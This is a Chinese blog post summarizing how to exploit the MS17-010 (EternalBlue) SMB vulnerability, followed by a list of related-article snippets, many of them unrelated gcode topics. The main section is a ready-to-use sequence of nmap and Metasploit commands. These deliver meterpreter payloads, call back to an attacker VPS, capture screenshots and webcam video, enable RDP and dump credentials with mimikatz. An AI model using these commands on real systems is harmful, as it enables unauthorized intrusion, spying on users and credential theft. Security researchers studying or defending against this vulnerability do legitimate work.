MS17010漏洞利用总结

article/2025/9/17 5:17:15

0x01 常规打法

扫描是否存在ms17-010漏洞:

nmap -n -p445 --script smb-vuln-ms17-010 192.168.1.0/24 --open

MSF常规漏洞利用:

msf > use exploit/windows/smb/ms17_010_eternalblue 
msf > set rhost 192.168.1.112 
反向打:
msf > set payload windows/x64/meterpreter/reverse_tcp 
msf > set lhost 192.168.1.118
正向打:
msf > set payload windows/x64/meterpreter/bind_tcp

常用功能:

桌面抓图 
meterpreter > screenshot
视频开启 
meterpreter > webcam_scream
开启远程桌面 
meterpreter > run post/windows/manage/enable_rdp 
目标密码破解
第一步:载入mimikatz
meterpreter > load mimikatz
第二步:使用命令wdigest获取密码
meterpreter >wdigest

0x02 反弹到VPS稳定打法

(常规打不好使的情况下。)

1.环境
vps 140.x.x.x
目标 192.168.3.123
本地kali 192.168.3.62

2.vps开启监听。

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 443
exploit -j -z 

在这里插入图片描述
3.kali下开始攻击。

use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.3.123
set payload windows/x64/meterpreter/reverse_tcp
set lhost 140.x.x.x  #反弹到vps
set lport 443

在这里插入图片描述
run到下图界面Ctrl+C
在这里插入图片描述
4.vps收到meterpreter。(如果不稳定就多打几次)
在这里插入图片描述

0x03 目标为Win2003情况下稳定打

方法一(命令执行)

msf5 > use auxiliary/admin/smb/ms17_010_command
msf5 > set command whoami
msf5 > set rhosts x.x.x.x

在这里插入图片描述
方法二(返回meterpreter)
在这里插入图片描述


http://chatgpt.dhexx.cn/article/bYQufdN1.shtml

相关文章

MS17010漏洞利用姿势

MSF 搜索ms17-010 存在这些利用模块 0 exploit/windows/smb/ms17_010_eternalblue 1 exploit/windows/smb/ms17_010_psexec 2 auxiliary/admin/smb/ms17_010_command 3 auxiliary/scanner/smb/smb_ms17_010 4 exploit/windows/smb/smb_doublepulsar_rce 0 expl…

〖EXP〗NSA MS17010永恒之蓝一键工具

漏洞简介 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯…

MS17010原生打法

1、针对入口跳板机已经CS上线但是因为目标所在区域代理出来的流量卡慢、扫描会导致代理隧道崩溃、MSF的17010不成功但是原生利用工具成功的场景。此工具是由最原版调用fb.py那版提取出来的(原生版是最为稳定,并且能利用的版本)。 项目地址:https://gith…

MS17010(永恒之蓝)漏洞复现

MS17010(永恒之蓝)漏洞利用与复现 首先需要准备win7的环境做为靶机 获取信息 利用nmap扫描得到,靶机IP nmap -sP 192.168.229.0/24得到: IP:192.168.229.169 然后利用: nmap --scriptvuln 192.168.229.169得到靶机信息: 发…

关于ms17010渗透

今天来说一下ms17010渗透,大家都知道在2017爆发出来了永恒之蓝病毒,导致比特币严重涨价(为啥我没屯几个,这可能就是我穷的的原因吧),永恒之蓝的漏洞版本名称也被称之为ms17_010今天就来详细和大家讲一下 靶…

Metasploit工具介绍及ms17010复现

Metasploit渗透框架介绍及永恒之蓝复现 一、Metasploit渗透框架介绍1.1 名词解释1.2 MSF简介1.3 MSF框架结构1.4 MSF命令汇总1.4.1 常用命令1.4.2 基本命令1.4.3 Exploits模块1.4.4 漏洞名称规则 1.5 MSF模块介绍1.5.1 auxiliary(辅助模块)1.5.2 exploits(漏洞利用模块)1.5.3 p…

永恒之蓝-------MS17010漏洞重现

目录 引言永恒之蓝介绍什么是SMB协议SMB协议的工作原理 实验环境准备实验开始查看靶机和攻击机ip地址及子网掩码使用netdiscover工具对该网段进行局域网存活主机探测使用nmap对ip地址进行查询打开MSF使用search搜索搜索ms17_010使用模块进行分析并攻击设置攻击机ip并开始最后运…

gcode 解析入门1-1

marlin2.X 的源码分析 gcode 源码, 文件目录 队列类 解析类 gcode 类 指令类 文件分类

GRBL三:gcode代码解析(转载)

因初学GRBL,网上搜集了一些GRBL的资料,怕遗忘,所以转载过来,如有侵权请联系,立即删除。 原文地址:https://blog.csdn.net/zhangjikuan/article/details/46697019 1.G00X_Y_Z_ :快速定位指令&#xff0c…

GCode_interpreter解读

关于GCode_interpreter 下学期要做课设,要徒手画a0的图,准备做个A0的绘图仪@_@ 本来想用grbl来驱动,但了解之后发现它是用avr的c写的,而且代码量也挺大的,考虑到后面可能要加一些功能(换笔什么的),怕修改不来,就放弃了。后来又找了很多g代码解释器,最后…

05-gcode

MMIM: BAPI 货物移动的可能代码 SE16N 后台表 T158G 01 MB01 ------------ 02 MB31 ------------ 03 MB1A ------------ 04 MB1B ------------ 05 MB1C ------------ 06 MB11 ------------ 07 MB04 GT_GSMT-MVT_IND 只有…

GRBL分析:gcode解释器(二)

GCode解释器 - gc_execute_line函数解析 更新记录 2021-8-23 添加函数功能描述 2021-8-24 添加简单的流程绘制 函数功能描述 函数原型 uint8_t gc_execute_line(char *line);参数 char* line 在 protocol.c 文件的 protocol_main_loop 函数中,主循环内部会…

Marlin关于如何接收Gcode指令的详解

我研究的Marlin是1.0版本的.想用在的地方是stm32 Marlin关于接收Gcode命令最主要的函数就是: get_command() get_command()函数说实话对于我这样的学生来说程度还是挺复杂的. 为了节省大家理清代码和阅读文章的时间, 我全文用字力求精简, 别人已经写了的知识我就不会写 先上…

Gcode文件处理和执行

流程图: 1:SMC_OutQueue 不带参数>>>SMC_Interpolator 插补算法 2:CMC_CNC_REF 带参数>>>smc_NCDecoder 图型解析>>>ToolCorr 刀补>>>SmoothPath 圆弧>>>checkVelocities 速度 3:File 文件.txt/.cnc/.gcode>…

GCD简介

1. 什么是GCD GCD,全称是Grand Central Dispatch,它是C语言的API. GCD的核心 : 将block(任务)添加到queue(队列)中. 官方文档的描述: Grand Central Dispatch(GCD)是异步执行任务的技术之一。一般将应用程序中记述的线程管理用的代码在系统级中实现.开发者只需定义想执行的任…

激光雕刻机的位图-GCode转换方法实践

Author:Gary Li Date:2019-5-2 1. 简介 现在有一部分3D打印机带有激光雕刻功能,自己组装一台专用的激光雕刻机也并不复杂成本也很低。但是当我们使用激光雕刻机时,激光雕刻下位机只能接受路径指令,所以我们需要把位图——也就是我们平时最常…

3d打印实用小工具--GCode Viewer在线预览GCODE文件

使用solidworks2018绘制了一个零件 使用simplify3d进行切片 然后点击保存了这个文件。 没想到打印的时候,竟然打印成了这个零件。 原因是拷贝错了文件,而自己切片成功之后的GCode文件也无法预览,最后造成了时间和材料的浪费。 那么怎么需要打…

三轴XYZ平台生成gcode文件

1. 生成gcode坐标文件 gcode文件中保存的是需要绘制图形的路径信息,这里我们采用开源矢量图形编辑软件 Inkscape并通过Unicorn G-Code插件来生成 gcode坐标文件。 将软件资料包\Inkscape.rar 压缩文件解压到电脑上任意磁盘,软件内已安装 Unicorn G-Code插…

GRBL三:gcode代码解析

GRBL三:gcode代码解析 1.G00X_Y_Z_ :快速定位指令,_代表具体数值 可以同时针对X轴Y轴Z轴移动,只快速定位,不切削加工,相当于快速的移动到那个点上去 数值代表绝对位置 2.G01X_Y_Z_F_:直线差补 F指定进给速度mm/min…

3D打印gcode命令大全及解析

*G0:快速移动 *G1:控制移动 坐标轴XYZE移动控制(G0和G1一样) 例子:G0 F2000 X30 Y30 Z30 E3 *G2:顺时针画弧 *G3:逆时针画弧 此命令有两种形式:IJ-form和R-form。I指定了X偏移…